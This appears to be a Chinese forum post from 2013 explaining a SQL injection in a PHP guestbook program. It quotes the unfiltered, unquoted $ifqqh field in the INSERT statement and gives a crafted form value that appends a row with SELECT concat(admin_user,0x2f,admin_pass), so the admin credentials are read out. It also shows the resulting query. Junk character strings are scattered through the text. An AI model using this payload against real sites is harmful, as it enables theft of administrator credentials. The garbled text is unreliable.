留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。* b; T- r: |8 [5 E6 D5 S
% C% E6 b+ w4 M$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
7 s/ k5 i. Q4 I" D; K/ T$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响
- {9 a3 u( o+ T O1 M0 k- A, m6 K
提交的时候把ifqqh的值改一下。变成3 I/ y. c8 W& v4 j. C" B: {
! ]& n( z8 N6 x4 H
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ /> g6 p( R* u6 t, t
- K; q7 I1 X, ?+ d! @( m0 {这样SQL插入语句就变了.) ?3 v3 c% t; V$ G8 ?
+ J5 K, m' S' Z/ `9 ^, Vinsert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0). p1 D; X0 A/ O# I
: _: ` {3 M H* R6 ^
构造了另外一句SQL。并且把帐号密码读出来。* M# s4 j: p% f( }, y4 a- ]
! d6 o% I* c+ X5 ?$ h |
发表于 2013-2-19 08:10:11
收藏
支持
反对